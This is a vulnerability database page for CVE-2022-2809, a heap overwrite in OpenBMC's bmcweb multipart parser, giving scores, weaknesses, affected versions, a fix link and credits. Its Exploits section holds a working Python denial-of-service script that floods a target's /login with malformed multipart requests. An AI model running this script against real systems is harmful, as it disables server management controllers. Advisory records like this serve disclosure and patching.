Logo
-

Byte Open Security

(ByteOS Network)

Log In

Sign Up

ByteOS

Security
Vulnerability Details
Registries
Custom Views
Weaknesses
Attack Patterns
Filters & Tools
Vulnerability Details :

CVE-2022-2809

Summary
Assigner-OpenBMC
Assigner Org ID-7eaec9cd-e18a-43f9-bb90-5f82d308c514
Published At-27 Oct, 2022 | 13:09
Updated At-05 May, 2025 | 20:20
Rejected At-
Credits

Unauthenticated out of bounds heap write in bmcweb

A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.

Vendors
-
Not available
Products
-
Metrics (CVSS)
VersionBase scoreBase severityVector
Weaknesses
Attack Patterns
Solution/Workaround
References
HyperlinkResource Type
EPSS History
Score
Latest Score
-
N/A
No data available for selected date range
Percentile
Latest Percentile
-
N/A
No data available for selected date range
Stakeholder-Specific Vulnerability Categorization (SSVC)
▼Common Vulnerabilities and Exposures (CVE)
cve.org
Assigner:OpenBMC
Assigner Org ID:7eaec9cd-e18a-43f9-bb90-5f82d308c514
Published At:27 Oct, 2022 | 13:09
Updated At:05 May, 2025 | 20:20
Rejected At:
▼CVE Numbering Authority (CNA)
Unauthenticated out of bounds heap write in bmcweb

A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.

Affected Products
Vendor
OpenBMC Project
Product
OpenBMC
Versions
Affected
  • From 2.10 before Release* (custom)
    • -> unaffectedfrom2.13
Problem Types
TypeCWE IDDescription
CWECWE-229CWE-229: Improper Handling of Values
CWECWE-122CWE-122: Heap-based Buffer Overflow
Type: CWE
CWE ID: CWE-229
Description: CWE-229: Improper Handling of Values
Type: CWE
CWE ID: CWE-122
Description: CWE-122: Heap-based Buffer Overflow
Metrics
VersionBase scoreBase severityVector
3.18.2HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
Version: 3.1
Base score: 8.2
Base severity: HIGH
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions

https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796

Configurations

Workarounds

Exploits

import socket import ssl import time HOST = "" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB PORT = 443 length = 322 additional = "" payload = """POST /login HTTP/1.1\r\nHost: <HOST-IP-ADDR-HERE>:8080\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\nContent-Length: %s\r\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\r\n\r\n-----------------------------d74496d66958873e\r\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\r\n\r\n""" if __name__ == "__main__": while(True): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE) client.connect((HOST, PORT)) toSend = payload % (str(length), additional) print(toSend) client.send(toSend.encode('utf-8')) print(client.recv(4096)) client.close() time.sleep(0.01) length += 1 additional += "a"

Credits

Finder: Jakub Rozanski, Intel Corporation
Remediation: Krzysztof Grobelny, Intel Corporation
Timeline
EventDate
Replaced By

Rejected Reason

References
HyperlinkResource
https://github.com/openbmc/bmcweb
N/A
Hyperlink: https://github.com/openbmc/bmcweb
Resource: N/A
▼Authorized Data Publishers (ADP)
1. CVE Program Container
Affected Products
Metrics
VersionBase scoreBase severityVector
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions

Configurations

Workarounds

Exploits

Credits

Timeline
EventDate
Replaced By

Rejected Reason

References
HyperlinkResource
https://github.com/openbmc/bmcweb
x_transferred
Hyperlink: https://github.com/openbmc/bmcweb
Resource:
x_transferred
2. CISA ADP Vulnrichment
Affected Products
Metrics
VersionBase scoreBase severityVector
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions

Configurations

Workarounds

Exploits

Credits

Timeline
EventDate
Replaced By

Rejected Reason

References
HyperlinkResource
Information is not available yet
▼National Vulnerability Database (NVD)
nvd.nist.gov
Source:openbmc-security@lists.ozlabs.org
Published At:27 Oct, 2022 | 13:15
Updated At:31 Oct, 2022 | 12:32

A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.

CISA Catalog
Date AddedDue DateVulnerability NameRequired Action
N/A
Date Added: N/A
Due Date: N/A
Vulnerability Name: N/A
Required Action: N/A
Metrics
TypeVersionBase scoreBase severityVector
Primary3.17.5HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Secondary3.18.2HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
Type: Primary
Version: 3.1
Base score: 7.5
Base severity: HIGH
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Type: Secondary
Version: 3.1
Base score: 8.2
Base severity: HIGH
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
CPE Matches

openbmc-project
openbmc-project
>>openbmc>>Versions from 2.10.0(inclusive) to 2.13.0(inclusive)
cpe:2.3:a:openbmc-project:openbmc:*:*:*:*:*:*:*:*
Weaknesses
CWE IDTypeSource
CWE-787Primarynvd@nist.gov
CWE-122Secondaryopenbmc-security@lists.ozlabs.org
CWE-229Secondaryopenbmc-security@lists.ozlabs.org
CWE ID: CWE-787
Type: Primary
Source: nvd@nist.gov
CWE ID: CWE-122
Type: Secondary
Source: openbmc-security@lists.ozlabs.org
CWE ID: CWE-229
Type: Secondary
Source: openbmc-security@lists.ozlabs.org
Evaluator Description

Evaluator Impact

Evaluator Solution

Vendor Statements

References
HyperlinkSourceResource
https://github.com/openbmc/bmcwebopenbmc-security@lists.ozlabs.org
Product
Third Party Advisory
Hyperlink: https://github.com/openbmc/bmcweb
Source: openbmc-security@lists.ozlabs.org
Resource:
Product
Third Party Advisory

Change History

0
Information is not available yet

Similar CVEs

0Records found

Details not found